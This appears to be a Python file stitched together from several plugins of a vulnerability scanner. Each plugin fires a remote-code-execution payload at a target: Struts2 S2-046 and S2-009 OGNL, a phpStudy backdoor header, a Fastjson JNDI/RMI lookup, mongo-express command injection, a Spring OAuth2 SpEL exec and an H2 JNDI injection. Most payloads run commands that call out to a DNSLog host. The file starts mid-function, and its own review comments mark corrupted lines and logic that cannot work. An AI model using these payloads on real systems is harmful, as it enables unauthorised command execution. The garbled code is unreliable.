        # IndexError when no session id was found; caught by the outer except and logged as a plugin error.
        payload_url2 = scheme + "://" + url + ":" + str(port) + payload +pgroups[0]

        headers2 = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            'Referer': payload_url2,
        }
        DL=Dnslog()  # fresh DNSLog token
        # NOTE(review): the next line is corrupted in this copy — the password
        # value, the POST request and the `if DL.result():` branch were lost in
        # extraction, so the block below does not parse as written.
        data= "language=en&setting=Generic+JNDI+Data+Source&name=Generic+JNDI+Data+Source&driver=javax.naming.InitialContext&url=ldap%3A%2F%2F{}%2FExploit&user=&password="******"{}存在SpringBootH2数据库JNDI注入漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text,DL.dns_host(),str(DL.dns_text()))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # pass url and the scan result to the details writer
            WriteFile().result(str(url),str(Medusa))  # write to file: url is the target filename, Medusa the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin name for the error log
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write(url, _)  # log URL and plugin name
def medusa(**kwargs) -> None:
    """Check the ``Url`` in *kwargs* for Struts2 S2-046.

    Posts a multipart body whose filename field carries an OGNL expression
    and then polls the DNSLog token. Nothing is returned; results go to
    ``VulnerabilityDetails`` and ``WriteFile``.

    Keyword Args:
        Url: full target URL, used as-is.
        Headers: request header dict — mutated in place (see below).
        Proxies: proxy setting passed straight to ``requests``.
    """
    url = kwargs.get("Url")  # target url
    Headers = kwargs.get("Headers")  # caller-supplied request headers
    proxies = kwargs.get("Proxies")  # caller-supplied proxy setting
    DL = Dnslog()  # fresh DNSLog token (see the note before DL.result())
    con = ""  # response body for the report; stays empty if the POST fails
    # NOTE(review): `resp` is a module global here; if the POST below raises,
    # `resp` keeps a stale value or is unbound when passed to VulnerabilityDetails.
    global resp
    # Multipart body; the OGNL in the filename runs `whoami` and streams its
    # output into the HTTP response. It does not contain the DNSLog host.
    data = b"""-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00"
Content-Type: text/plain

x
-----------------------------735323031399963166993862150--
"""
    try:
        payload_url = url

        # Headers is the caller's dict and is mutated in place: these two
        # values persist for any later plugin that shares the same dict.
        Headers["Content-Length"] = "10000000"
        Headers[
            "Content-Type"] = "multipart/form-data; boundary=---------------------------735323031399963166993862150"

        try:  # guard: if the target hangs (e.g. on Linux) the timeout must not abort the check
            resp = requests.post(payload_url,
                                 headers=Headers,
                                 data=data,
                                 timeout=6,
                                 proxies=proxies,
                                 verify=False)
            con = resp.text

        except Exception as e:
            pass  # swallowed: `con` stays empty and the check falls through to the DNS poll

        time.sleep(2)
        # NOTE(review): DL.dns_host() is never embedded in `data`, so this
        # payload cannot trigger the DNSLog token and the branch below is
        # effectively unreachable; `con` is not inspected either, so a
        # vulnerable target is reported as clean (false negative).
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-046)\r\n漏洞详情:\r\n版本号:S2-046\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
                url, data, con, DL.dns_text(), DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp,
                                 **kwargs).Write()  # pass response and scan result to the details writer
            WriteFile().result(str(url),
                               str(Medusa))  # write to file: url is the target filename, Medusa the result
    except Exception as e:
        # NOTE(review): if 'algroup' is missing the concatenation below raises TypeError — confirm.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                              e)  # write to the error log
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Check *Url* for the phpStudy backdoor via DNS callback.

    Sends a GET to ``/index.php`` carrying a base64-encoded PHP statement in
    the ``accept-charset`` header, waits, and records a finding only if the
    DNSLog host reports a lookup. Nothing is returned.

    Args:
        Url: target URL, split by ``UrlProcessing`` into scheme, host, port.
        RandomAgent: User-Agent string for the probe request.
        proxies: proxy setting, normalised by ``Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL does not carry one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port already present; no-op
    DL = Dnslog()  # fresh DNSLog token
    payload = "/index.php"
    commandS = ('''system("ping {}");''').format(DL.dns_host())
    cmd = base64.b64encode(commandS.encode('utf-8'))  # bytes; requests accepts bytes header values
    try:
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Sec-Fetch-Mode': 'navigate',
            # NOTE(review): this header value appears garbled in this copy ('******').
            'Sec-Fetch-User': '******',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Sec-Fetch-Site': 'none',
            'accept-charset': cmd,  # the encoded statement rides in this header
            'Accept-Encoding': 'gzip,deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'User-Agent': RandomAgent
        }
        resp = requests.get(payload_url,
                            headers=headers,
                            timeout=5,
                            proxies=proxies,
                            verify=False)
        time.sleep(2)  # give the out-of-band lookup time to reach the DNSLog service
        if DL.result():
            # The full header dict (including the encoded command) is written into the report.
            Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format(
                url, payload_url, headers, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,
                                 **kwargs).Write()  # pass url and the scan result to the details writer
            WriteFile().result(str(url),
                               str(Medusa))  # write to file: url is the target filename, Medusa the result
    except Exception as e:
        # NOTE(review): if 'algroup' is missing the concatenation below raises TypeError — confirm.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                              e)  # write to the error log
def medusa(Url, RandomAgent, UnixTimestamp) -> None:
    """Check *Url* for Fastjson deserialisation RCE via DNS callback.

    Posts a JSON document referencing ``JdbcRowSetImpl`` with an RMI data
    source on the DNSLog host. A finding requires both a DNSLog lookup and
    an HTTP 500 reply. Nothing is returned.

    Args:
        Url: target URL, split by ``UrlProcessing`` into scheme, host, port.
        RandomAgent: User-Agent string for the probe request.
        UnixTimestamp: passed positionally to ``VulnerabilityDetails``.

    Note: this variant takes no proxy setting; the request goes out directly.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL does not carry one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port already present; no-op
    try:
        payload_url = scheme + '://' + url + ':' + str(port)  # posted to the site root
        DL = Dnslog()  # fresh DNSLog token
        data = {
            "b": {
                "@type": "com.sun.rowset.JdbcRowSetImpl",
                "dataSourceName": "rmi://" + DL.dns_host() + "//Exploit",
                "autoCommit": True
            }
        }
        data = json.dumps(data)  # serialised here rather than via json=, so Content-Type is set by hand below
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/json',
            'Accept-Language':
            'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            "Connection": "close",
            "Accept-Encoding": "gzip, deflate"
        }
        resp = requests.post(payload_url,
                             headers=headers,
                             data=data,
                             timeout=10,
                             verify=False)
        # Two signals are required: the DNS callback and a 500 status
        # (presumably the server-side error while processing the object — confirm).
        # No delay before polling; a slow callback may be missed.
        if DL.result() and resp.status_code == 500:
            Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(
                url, payload_url, resp.text, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,
                                 UnixTimestamp).Write()  # pass url and the scan result to the details writer
            WriteFile().result(str(url),
                               str(Medusa))  # write to file: url is the target filename, Medusa the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')  # plugin name for the error log
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write(url, _)  # log URL and plugin name
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check *Url* for mongo-express RCE (CVE-2019-10758) via DNS callback.

    Posts a ``document=`` expression to ``/checkValid`` that runs ``ping``
    against the DNSLog host, waits, and records a finding only if the DNSLog
    host reports a lookup. Nothing is returned.

    Args:
        Url: target URL (see the UrlProcessing note below).
        Headers: caller's header dict — mutated in place (see below).
        proxies: proxy setting, normalised by ``Proxies().result``.
        **kwargs: forwarded to ``ClassCongregation.VulnerabilityDetails``.
    """
    proxies = Proxies().result(proxies)

    # NOTE(review): UrlProcessing(Url) is called directly, without the
    # .result() used by the sibling plugins — if UrlProcessing is a class this
    # unpacking fails, and it runs outside the try so the error propagates.
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL does not carry one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port already present; no-op
    try:
        payload = "/checkValid"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        dns = Dnslog()  # fresh DNSLog token
        data = 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping {}")'.format(
            dns.dns_host())

        # Headers is the caller's dict and is mutated in place; these values
        # persist for any later plugin sharing the same dict.
        Headers['Accept'] = '*/*'
        # Hard-coded Basic credentials (base64 of admin:pass, the mongo-express
        # default): the check only succeeds where the defaults are still in use.
        Headers['Authorization'] = 'Basic YWRtaW46cGFzcw=='
        Headers['Connection'] = 'close'
        Headers['Content-Type'] = 'application/x-www-form-urlencoded'
        # Fixed value; requests normally recomputes Content-Length for a str body,
        # so this is probably overridden — confirm.
        Headers['Content-Length'] = '123'

        requests.post(payload_url,
                      data=data,
                      headers=Headers,
                      timeout=6,
                      proxies=proxies,
                      verify=False)
        time.sleep(10)  # give the out-of-band lookup time to reach the DNSLog service
        if dns.result():
            Medusa = "{} 存在mongo-express远程代码执行漏洞(CVE-2019-10758)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\npayload:{}".format(
                url, payload_url, data)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # pass url and the scan result to the details writer
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url is the target filename, Medusa the result
    except Exception as e:
        # NOTE(review): if 'algroup' is missing the concatenation below raises TypeError — confirm.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  # write to the error log
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check *Url* for Fastjson deserialisation RCE via DNS callback.

    Posts a JSON document referencing ``JdbcRowSetImpl`` with an RMI data
    source on the DNSLog host. A finding requires both a DNSLog lookup and
    an HTTP 500 reply. Nothing is returned.

    Args:
        Url: target URL, split by ``UrlProcessing`` into scheme, host, port.
        Headers: caller's header dict — mutated in place (see below).
        proxies: proxy setting, normalised by ``Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL does not carry one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port already present; no-op
    try:
        payload_url = scheme + '://' + url + ':' + str(port)  # posted to the site root
        DL = Dnslog()  # fresh DNSLog token
        data = {
            "b": {
                "@type": "com.sun.rowset.JdbcRowSetImpl",
                "dataSourceName": "rmi://" + DL.dns_host() + "//Exploit",
                "autoCommit": True
            }
        }
        data = json.dumps(data)  # serialised here rather than via json=, so Content-Type is set by hand below
        # Headers is the caller's dict and is mutated in place; these values
        # persist for any later plugin sharing the same dict.
        Headers['Content-Type'] = 'application/json'
        Headers["Connection"] = "close"

        resp = requests.post(payload_url,
                             headers=Headers,
                             data=data,
                             proxies=proxies,
                             timeout=10,
                             verify=False)
        # Two signals are required: the DNS callback and a 500 status
        # (presumably the server-side error while processing the object — confirm).
        # No delay before polling; a slow callback may be missed.
        if DL.result() and resp.status_code == 500:
            Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(
                url, payload_url, resp.text, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,
                                 **kwargs).Write()  # pass url and the scan result to the details writer
            WriteFile().result(str(url),
                               str(Medusa))  # write to file: url is the target filename, Medusa the result
    except Exception as e:
        # NOTE(review): if 'algroup' is missing the concatenation below raises TypeError — confirm.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                              e)  # write to the error log
def medusa(**kwargs)->None:
    """Check the ``Url`` in *kwargs* for Spring Security OAuth2 RCE (CVE-2018-1260).

    Appends an ``/oauth/authorize`` request whose ``scope`` carries a SpEL
    expression pinging the DNSLog host, waits, and records a finding only if
    the DNSLog host reports a lookup. Nothing is returned.

    Keyword Args:
        Url: full target URL; the payload is appended to it as-is.
        Headers: request header dict passed straight to ``requests``.
        Proxies: proxy setting passed straight to ``requests``.
    """
    url = kwargs.get("Url")  # target url
    Headers = kwargs.get("Headers")  # caller-supplied request headers
    proxies = kwargs.get("Proxies")  # caller-supplied proxy setting
    try:

        DL=Dnslog()  # fresh DNSLog token
        payload ="/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format(DL.dns_host())
        # Plain concatenation: assumes `url` has no trailing path or query of its own.
        payload_url = url + payload
        resp = requests.get(payload_url,headers=Headers, proxies=proxies, timeout=6, verify=False)
        time.sleep(4)  # give the out-of-band lookup time to reach the DNSLog service
        if DL.result():
            Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞(CVE-2018-1260)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text()))
            _t = VulnerabilityInfo(Medusa)
            # NOTE(review): `resp` is passed where the sibling plugins pass `url` — confirm which one VulnerabilityDetails expects.
            VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # pass response and scan result to the details writer
            WriteFile().result(str(url),str(Medusa))  # write to file: url is the target filename, Medusa the result
    except Exception as e:
        # NOTE(review): if 'algroup' is missing the concatenation below raises TypeError — confirm.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)  # write to the error log
def medusa(**kwargs) -> None:
    """Check the ``Url`` in *kwargs* for Struts2 S2-009 via DNS callback.

    Appends an OGNL expression in the query string that pings the DNSLog
    host, waits, and records a finding only if the DNSLog host reports a
    lookup. Nothing is returned.

    Keyword Args:
        Url: full target URL; the payload is appended to it as-is.
        Headers: request header dict passed straight to ``requests``.
        Proxies: proxy setting passed straight to ``requests``.
    """
    url = kwargs.get("Url")  # target url
    Headers = kwargs.get("Headers")  # caller-supplied request headers
    proxies = kwargs.get("Proxies")  # caller-supplied proxy setting
    DL = Dnslog()  # fresh DNSLog token
    payload = """?age=medusa&name=%28%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3D+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29%29%28meh%29&z%5B%28name%29%28%27meh%27%29%5D=true""".format(
        DL.dns_host())
    try:
        # Plain concatenation: assumes `url` has no query string of its own.
        payload_url = url + payload

        # No inner try here: a timeout or connection error goes straight to the
        # except branch below, so a target that hangs on the probe is logged as
        # a plugin error and its DNS callback is never polled.
        resp = requests.get(payload_url,
                            headers=Headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        time.sleep(3)  # give the out-of-band lookup time to reach the DNSLog service
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-009)\r\n漏洞详情:\r\n版本号:S2-009\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
                url, payload_url, con, DL.dns_text(), DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            # NOTE(review): `resp` is passed where most sibling plugins pass `url` — confirm which one VulnerabilityDetails expects.
            VulnerabilityDetails(_t.info, resp,
                                 **kwargs).Write()  # pass response and scan result to the details writer
            WriteFile().result(str(url),
                               str(Medusa))  # write to file: url is the target filename, Medusa the result
    except Exception as e:
        # NOTE(review): if 'algroup' is missing the concatenation below raises TypeError — confirm.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                              e)  # write to the error log